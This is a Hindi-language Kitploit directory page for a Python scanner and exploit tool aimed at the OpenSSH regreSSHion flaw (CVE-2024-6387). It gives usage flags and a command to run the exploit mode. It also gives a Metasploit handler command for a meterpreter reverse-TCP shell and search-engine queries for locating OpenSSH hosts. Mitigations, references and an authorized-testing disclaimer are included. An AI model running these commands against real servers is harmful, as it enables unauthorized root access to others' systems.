Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-6387 — OpenSSH सर्वर में दूरस्थ अनप्रमाणित कोड निष्पादन भेद्यता (CVE-2024-6387) | Kitploit
उपकरण/GitHubGitHub/karmakstylez/cve-2024-6387
टोहीभेद्यता स्कैनरशोषणनेटवर्क सुरक्षापेनिट्रेशन टेस्टिंगरिमोट एक्सेस टूल
GitHubkarmakstylez/cve-2024-6387

CVE-2024-6387

OpenSSH सर्वर में दूरस्थ अनप्रमाणित कोड निष्पादन भेद्यता (CVE-2024-6387)

रिपॉजिटरी देखें
1884742 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

openssh CVE-2024-6387.py - PoC

महत्वपूर्ण नोट्स!!!

यह एक्सप्लॉइट केवल 32-बिट OpenSSH-सर्वर के लिए काम करता है। ऐसा इसलिए है क्योंकि POC 32-बिट पॉइंटर्स का उपयोग करता है! यह भी ज्ञात है कि कुछ संस्करण पहले से ही पैच किए जा चुके हैं, और हर सर्वर असुरक्षित नहीं है। परीक्षण किया गया: Kali Linux, ParrotSec, Ubuntu 22.04

📜 विवरण

OpenSSH सर्वर में दूरस्थ अप्रमाणित कोड निष्पादन भेद्यता

CVE-2024-6387.py एक हल्का और कुशल टूल है जिसे OpenSSH के असुरक्षित संस्करणों को चलाने वाले सर्वरों की पहचान करने के लिए डिज़ाइन किया गया है, विशेष रूप से हाल ही में खोजी गई regreSSHion भेद्यता (CVE-2024-6387) को लक्षित करते हुए। यह स्क्रिप्ट संभावित कमजोरियों का पता लगाने और आपके इंफ्रास्ट्रक्चर की सुरक्षा सुनिश्चित करने के लिए कई IP पतों, डोमेन नामों और CIDR नेटवर्क रेंजों की तीव्र स्कैनिंग की सुविधा प्रदान करती है।

OpenSSH के सर्वर (sshd) में एक सिग्नल हैंडलर रेस कंडीशन पाई गई, जहां एक क्लाइंट LoginGraceTime सेकंड (डिफ़ॉल्ट रूप से 120, पुराने OpenSSH संस्करणों में 600) के भीतर प्रमाणित नहीं होता है, तो sshd का SIGALRM हैंडलर अतुल्यकालिक रूप से कॉल किया जाता है। हालाँकि, यह सिग्नल हैंडलर विभिन्न फ़ंक्शनों को कॉल करता है जो async-signal-safe नहीं हैं, उदाहरण के लिए, syslog()।

📁 विषय-सूची

  • 📖 विवरण
  • 🌟 विशेषताएँ
  • ⚙️ उपयोग
  • O आउटपुट
  • 🔍 होस्ट खोज
  • 🛠️ शमन
  • 💁 संदर्भ
  • 📌 लेखक
  • 📢 अस्वीकरण

✍🏻 विवरण

आप तकनीकी विवरण यहाँ पा सकते हैं।

यह दोष, जिसे Qualys के शोधकर्ताओं ने मई 2024 में खोजा और जिसे पहचानकर्ता CVE-2024-6387 सौंपा गया, sshd में एक सिग्नल हैंडलर रेस कंडीशन के कारण होता है जो अप्रमाणित दूरस्थ हमलावरों को रूट के रूप में मनमाना कोड निष्पादित करने की अनुमति देता है।

"यदि कोई क्लाइंट LoginGraceTime सेकंड (डिफ़ॉल्ट रूप से 120) के भीतर प्रमाणित नहीं होता है, तो sshd का SIGALRM हैंडलर अतुल्यकालिक रूप से कॉल किया जाता है और विभिन्न फ़ंक्शनों को कॉल करता है जो async-signal-safe नहीं हैं,"

"एक दूरस्थ अप्रमाणित हमलावर रूट विशेषाधिकारों के साथ मनमाना कोड निष्पादित करने के लिए इस दोष का लाभ उठा सकता है।"

🌟 विशेषताएँ

  • तीव्र स्कैनिंग: CVE-2024-6387 भेद्यता के लिए कई IP पतों, डोमेन नामों और CIDR रेंजों को तेज़ी से स्कैन करें।
  • बैनर प्राप्ति: प्रमाणीकरण के बिना SSH बैनर कुशलतापूर्वक प्राप्त करता है।
  • ग्रेस टाइम जाँच: वैकल्पिक रूप से पता लगाएं कि क्या सर्वरों ने LoginGraceTime सेटिंग का उपयोग करके कमजोरियों को शमित किया है।
  • IPv6 समर्थन: प्रत्यक्ष और होस्टनाम-आधारित दोनों स्कैनिंग के लिए IPv6 पतों का पूर्ण समर्थन करता है।
  • मल्टी-थ्रेडिंग: समवर्ती जाँच के लिए थ्रेडिंग का उपयोग करता है, जिससे स्कैन समय में काफी कमी आती है।
  • विस्तृत आउटपुट: स्कैन परिणामों का सारांश देने वाला स्पष्ट, इमोजी-कोडित आउटपुट प्रदान करता है।
  • पोर्ट जाँच: बंद पोर्टों की पहचान करता है और अनुत्तरदायी होस्टों का सारांश प्रदान करता है।
  • पैच किए गए संस्करणों का पता लगाना: ज्ञात पैच किए गए संस्करणों को पहचानता है और उन्हें भेद्यता रिपोर्ट से बाहर करता है।

⚙️ उपयोग

OpenSSH सर्वर की स्कैनिंग

आवश्यकता: python3 नवीनतम

root@kitploit:~
### Command Line Arguments
mode: Selects the operation mode. Choices are scan or exploit.
-T, --targets: IP addresses, domain names, file paths containing IP addresses, or CIDR network ranges.
-f, --outputfile: File to save results to (e.g., result.json).
-g, --gracetimecheck: Time in seconds to wait after identifying the version to check for LoginGraceTime mitigation (default: 120 seconds).
-n, --nic: Network NIC (default: 'eth0').
-o, --output: Output format for results (choices: 'csv', 'txt', 'json').
-p, --port: Port number to check or exploit (default: 22).
-s, --speed: Number of threads to increase race condition chances (default: 10).
-t, --timeout: Connection timeout in seconds (default: 1 second).
-H, --resolve-hostnames: Resolve Hostnames

उदाहरण

एकल URL/IP की स्कैनिंग

root@kitploit:~
python3 CVE-2024-6387.py scan -T example.com -p 22

एक डोमेन / IP पर एक्सप्लॉइट चलाना

root@kitploit:~
python3 CVE-2024-6387.py exploit -T example.com -p 22 -n eth0

विशेषाधिकार एस्केलेशन प्रक्रिया

पेलोड कैप्चर करना

आपको बस सबसे पहले नीचे दिया गया कमांड चलाना है ({yourip} हैंडलर को बदलें) और उसके बाद उपरोक्त कमांड के साथ एक्सप्लॉइट चलाएं

root@kitploit:~
msfconsole -q -x "use exploit/multi/handler; set PAYLOAD linux/x64/meterpreter/reverse_tcp; set LHOST {yourip}; set LPORT 9999; exploit -j"

आउटपुट

टूल बेहतर पठनीयता के लिए कंसोल पर रंग-कोडित आउटपुट प्रदान करता है:

हरा: सफल कनेक्शन या ऑपरेशन। लाल: विफल कनेक्शन या त्रुटि। पीला: चेतावनियाँ या उल्लेखनीय जानकारी। सियान: सामान्य जानकारी या स्थिति अपडेट।

🔍 होस्ट खोज

  • Hunter: /product.name="OpenSSH"
  • FOFA: app="OpenSSH"
  • SHODAN: product:"OpenSSH"
  • CENSYS: (openssh) and labels=remote-access

🛠️ शमन

  • पैच प्रबंधन: OpenSSH के लिए उपलब्ध पैच को तुरंत लागू करना भेद्यता की खाई को बंद करने के लिए महत्वपूर्ण है। समय पर पैचिंग यह सुनिश्चित करती है कि ज्ञात शोषणों का उपयोग आपके सिस्टम के विरुद्ध नहीं किया जा सकता है, जिससे हमलावरों के लिए अवसर की खिड़की कम हो जाती है।

  • उन्नत पहुंच नियंत्रण: नेटवर्क-आधारित नियंत्रणों के माध्यम से SSH पहुंच को सीमित करना सुरक्षा की एक अतिरिक्त परत जोड़ता है। यह दृष्टिकोण SSH कनेक्शनों को केवल अधिकृत नेटवर्कों या IP पतों तक प्रतिबंधित करके संभावित हमलावरों के संपर्क को न्यूनतम करता है। फ़ायरवॉल नियमों जैसे उपकरणों को लागू करना या सुरक्षित पहुंच के लिए VPN का उपयोग करना इन प्रतिबंधों को प्रभावी ढंग से लागू कर सकता है।

  • नेटवर्क विभाजन: अपने नेटवर्क को खंडों में विभाजित करना संभावित उल्लंघन के प्रभाव को नियंत्रित करने में मदद करता है। महत्वपूर्ण प्रणालियों और संवेदनशील डेटा को अपने नेटवर्क के कम महत्वपूर्ण भागों से अलग करके, आप हमलावरों द्वारा पार्श्व गतिविधि के जोखिम को कम करते हैं। इस विभाजन को सख्त पहुंच नियंत्रण और निगरानी के साथ पूरक किया जा सकता है ताकि इन खंडों को तोड़ने के किसी भी अनधिकृत प्रयास का पता लगाया जा सके और उसका जवाब दिया जा सके।

  • आक्रमण पहचान प्रणाली (IDS): IDS या आक्रमण रोकथाम प्रणाली (IPS) तैनात करना नेटवर्क ट्रैफ़िक और सिस्टम लॉग की वास्तविक समय निगरानी सक्षम बनाता है। ये प्रणालियाँ regreSSHion भेद्यता से जुड़ी संदिग्ध गतिविधियों और संभावित शोषण प्रयासों का पता लगा सकती हैं। ऐसी प्रणालियों द्वारा ट्रिगर की गई चेतावनियाँ महत्वपूर्ण क्षति होने से पहले त्वरित जांच और शमन की अनुमति देती हैं।

  • शोषण प्रयासों की निगरानी: नेटवर्क और सिस्टम लॉग की निरंतर निगरानी महत्वपूर्ण है। ऐसे किसी भी असामान्य पैटर्न या गतिविधि की तलाश करें जो OpenSSH भेद्यता का शोषण करने के प्रयास का संकेत दे सकती है। यह सक्रिय दृष्टिकोण नुकसान पहुंचाने से पहले खतरों की पहचान करने और उनका जवाब देने में मदद करता है।

💁 संदर्भ

  • मूल लेखक: CVE-2024-6387 Scanner
  • मूल लेखक: CVE-2024-6387 PoC

अतिरिक्त संदर्भ

  • http://www.openwall.com/lists/oss-security/2024/07/01/12
  • https://access.redhat.com/security/cve/CVE-2024-6387
  • https://bugzilla.redhat.com/show_bug.cgi?id=2294604
  • https://www.qualys.com/2024/07/01/cve-2024-6387/regresshion.txt
  • https://github.com/zgzhang/cve-2024-6387-poc
  • https://ubuntu.com/security/CVE-2024-6387
  • https://ubuntu.com/security/notices/USN-6859-1
  • https://www.suse.com/security/cve/CVE-2024-6387.html
  • https://explore.alas.aws.amazon.com/CVE-2024-6387.html
  • https://archlinux.org/news/the-sshd-service-needs-to-be-restarted-after-upgrading-to-openssh-98p1/
  • https://www.openssh.com/txt/release-9.8
  • https://lists.mindrot.org/pipermail/openssh-unix-announce/2024-July/000158.html
  • https://lists.mindrot.org/pipermail/openssh-unix-dev/2024-July/041431.html
  • https://blog.qualys.com/vulnerabilities-threat-research/2024/07/01/regresshion-remote-unauthenticated-code-execution-vulnerability-in-openssh-server
  • https://www.theregister.com/2024/07/01/regresshion_openssh/
  • https://news.ycombinator.com/item?id=40843778

📢 अस्वीकरण

  • महत्वपूर्ण नोट:
    • यह टूल केवल अधिकृत पैठ परीक्षण और रेड टीमिंग अभ्यासों के लिए विकसित और उपयोग किया जाता है। इसे glibc-आधारित Linux प्रणालियों पर OpenSSH सर्वर में कमजोरियों की पहचान करने और उनका शोषण करने के लिए डिज़ाइन किया गया है। इस टूल का अनधिकृत उपयोग सख्त वर्जित है। इस टूल का स्वामी किसी भी अनधिकृत पहुंच या टूल के दुर्भावनापूर्ण उपयोग के लिए जिम्मेदार नहीं है।
  • कानूनी सूचना:
    • संबंधित स्वामियों से स्पष्ट प्राधिकरण के बिना प्रणालियों या नेटवर्कों पर इस टूल का अनधिकृत उपयोग लागू कानूनों और विनियमों का उल्लंघन कर सकता है। साइबर सुरक्षा परीक्षण और मूल्यांकन को नियंत्रित करने वाले कानूनी और नैतिक मानकों का अनुपालन सुनिश्चित करने के लिए उपयोगकर्ता जिम्मेदार हैं।
टूल डाउनलोड करें
  • https://security-tracker.debian.org/tracker/CVE-2024-6387
  • https://github.com/oracle/oracle-linux/issues/149
  • https://github.com/rapier1/hpn-ssh/issues/87
  • https://stackdiary.com/openssh-race-condition-in-sshd-allows-remote-code-execution/
  • https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2024-0010
  • http://www.openwall.com/lists/oss-security/2024/07/01/13
  • https://security.netapp.com/advisory/ntap-20240701-0001/